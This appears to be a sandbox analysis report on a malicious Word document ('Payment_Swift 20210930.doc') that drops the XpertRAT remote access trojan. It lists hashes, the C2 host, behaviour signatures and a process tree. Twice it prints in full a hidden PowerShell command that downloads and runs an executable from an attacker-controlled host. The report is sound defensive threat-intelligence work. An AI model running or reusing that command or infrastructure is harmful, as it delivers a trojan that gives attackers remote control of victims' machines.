Overview

overview

10

Static

static

Payment_Sw...30.doc

windows7_x64

10

Payment_Sw...30.doc

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    30-09-2021 16:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Payment_Swift 20210930.doc

  • Size

    271KB

  • MD5

    28baa3fb9c80b7604bbc81962e5414b3

  • SHA1

    6b61e6dc6eeeab42d9665659e3bc353bb913716d

  • SHA256

    39c889d91c4bc0fe97e2c565d3a0e103372ba15f988872d049b9277473a87e24

  • SHA512

    cb6cbe0e8be6e36dabd18613857f34b1b30871667fa594151d367c789765c277ed23fc882c4f11dca3ffdeae82aa71dad395a0210003643e7f796dc16db3d2a1

Score
10/10
xpertrattestevasionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://avira.ydns.eu/EXCEL.exe

Extracted

Family

xpertrat

Version

3.0.10

Botnet

Test

C2

kapasky-antivirus.firewall-gateway.net:4000

Mutex

L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs
    evasiontrojan
  • Windows security bypass 2 TTPs
    evasiontrojan
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

    ratxpertrat
  • XpertRAT Core Payload 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment_Swift 20210930.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:340
      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1492
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          PID:856
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          PID:1716
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          • Windows security modification
          • Checks whether UAC is enabled
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • System policy modification
          PID:1328
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            5⤵
              PID:596
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
              5⤵
              • Adds policy Run key to start application
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1836
              • C:\Windows\SysWOW64\notepad.exe
                notepad.exe
                6⤵
                  PID:1368
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
          2⤵
          • Process spawned unexpected child process
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Users\Admin\AppData\Roaming\EXCEL.exe
            "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1056
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com
              4⤵
                PID:1352
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1548
              • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                4⤵
                • Executes dropped EXE
                • Windows security modification
                • Checks whether UAC is enabled
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • System policy modification
                PID:1696
                • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                  5⤵
                    PID:1684
                  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                    C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                    5⤵
                      PID:828
              • C:\Windows\splwow64.exe
                C:\Windows\splwow64.exe 12288
                2⤵
                  PID:1148

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              Registry Run Keys / Startup Folder

              2
              T1060

              Privilege Escalation

              Bypass User Account Control

              1
              T1088

              Defense Evasion

              Bypass User Account Control

              1
              T1088

              Disabling Security Tools

              3
              T1089

              Modify Registry

              7
              T1112

              Credential Access

              Discovery

              System Information Discovery

              2
              T1082

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                MD5

                d4f570ca4668b2659de4e50985d6b942

                SHA1

                edb1826cd89426c66954e34033ae2bac471874ae

                SHA256

                f78303dd088ae6ca135c220a6c4907ef103bdfb3afd4ecdc74204c467323ca85

                SHA512

                2b0ddc24c911b526f28a04ed6c79bf201681cab9e3016b0176bb0a54d6bff2863bc0436bfbcf92c372be7e46d44bc1e560de88bd9f48ba56ad45373ffb901b85

                Download Submit
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                MD5

                d4f570ca4668b2659de4e50985d6b942

                SHA1

                edb1826cd89426c66954e34033ae2bac471874ae

                SHA256

                f78303dd088ae6ca135c220a6c4907ef103bdfb3afd4ecdc74204c467323ca85

                SHA512

                2b0ddc24c911b526f28a04ed6c79bf201681cab9e3016b0176bb0a54d6bff2863bc0436bfbcf92c372be7e46d44bc1e560de88bd9f48ba56ad45373ffb901b85

                Download Submit
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                MD5

                d4f570ca4668b2659de4e50985d6b942

                SHA1

                edb1826cd89426c66954e34033ae2bac471874ae

                SHA256

                f78303dd088ae6ca135c220a6c4907ef103bdfb3afd4ecdc74204c467323ca85

                SHA512

                2b0ddc24c911b526f28a04ed6c79bf201681cab9e3016b0176bb0a54d6bff2863bc0436bfbcf92c372be7e46d44bc1e560de88bd9f48ba56ad45373ffb901b85

                Download Submit
              • \??\PIPE\srvsvc
                MD5

                d41d8cd98f00b204e9800998ecf8427e

                SHA1

                da39a3ee5e6b4b0d3255bfef95601890afd80709

                SHA256

                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                SHA512

                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                Download Submit
              • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • \Users\Admin\AppData\Roaming\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • \Users\Admin\AppData\Roaming\EXCEL.exe
                MD5

                cb12b24b0f69225693168e9c35761a1b

                SHA1

                0f68f676d76e3546d7d625cdb14f0947c59beff5

                SHA256

                c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535

                SHA512

                9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

                Download Submit
              • memory/340-57-0x0000000000000000-mapping.dmp
                Download
              • memory/596-119-0x0000000000401364-mapping.dmp
                Download
              • memory/828-121-0x0000000000401364-mapping.dmp
                Download
              • memory/1056-81-0x0000000004C10000-0x0000000004C11000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1056-69-0x0000000000000000-mapping.dmp
                Download
              • memory/1148-130-0x0000000000000000-mapping.dmp
                Download
              • memory/1148-131-0x000007FEFC461000-0x000007FEFC463000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1328-110-0x00000000004010B8-mapping.dmp
                Download
              • memory/1352-78-0x0000000000000000-mapping.dmp
                Download
              • memory/1368-63-0x0000000002350000-0x0000000002F9A000-memory.dmp
                Filesize

                12.3MB

                Download
              • memory/1368-62-0x0000000002350000-0x0000000002F9A000-memory.dmp
                Filesize

                12.3MB

                Download
              • memory/1368-58-0x0000000000000000-mapping.dmp
                Download
              • memory/1368-127-0x0000000000000000-mapping.dmp
                Download
              • memory/1492-84-0x0000000002382000-0x0000000002384000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1492-82-0x0000000002380000-0x0000000002381000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1492-83-0x0000000002381000-0x0000000002382000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1492-77-0x0000000000000000-mapping.dmp
                Download
              • memory/1496-95-0x0000000000C00000-0x0000000000C4F000-memory.dmp
                Filesize

                316KB

                Download
              • memory/1496-96-0x0000000000840000-0x0000000000870000-memory.dmp
                Filesize

                192KB

                Download
              • memory/1496-65-0x0000000000000000-mapping.dmp
                Download
              • memory/1496-71-0x0000000000D20000-0x0000000000D21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1496-80-0x0000000004800000-0x0000000004801000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1548-86-0x0000000000000000-mapping.dmp
                Download
              • memory/1684-116-0x0000000000400000-0x0000000000443000-memory.dmp
                Filesize

                268KB

                Download
              • memory/1684-117-0x0000000000401364-mapping.dmp
                Download
              • memory/1696-106-0x0000000000400000-0x000000000042C000-memory.dmp
                Filesize

                176KB

                Download
              • memory/1696-107-0x00000000004010B8-mapping.dmp
                Download
              • memory/1740-56-0x00000000765A1000-0x00000000765A3000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1740-54-0x00000000709D1000-0x00000000709D3000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1740-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1740-53-0x0000000072F51000-0x0000000072F54000-memory.dmp
                Filesize

                12KB

                Download
              • memory/1752-94-0x00000000021F2000-0x00000000021F4000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1752-92-0x00000000021F0000-0x00000000021F1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1752-93-0x00000000021F1000-0x00000000021F2000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1752-85-0x0000000000000000-mapping.dmp
                Download
              • memory/1836-123-0x0000000000401364-mapping.dmp
                Download
              • memory/1836-124-0x00000000004C0000-0x0000000000613000-memory.dmp
                Filesize

                1.3MB

                Download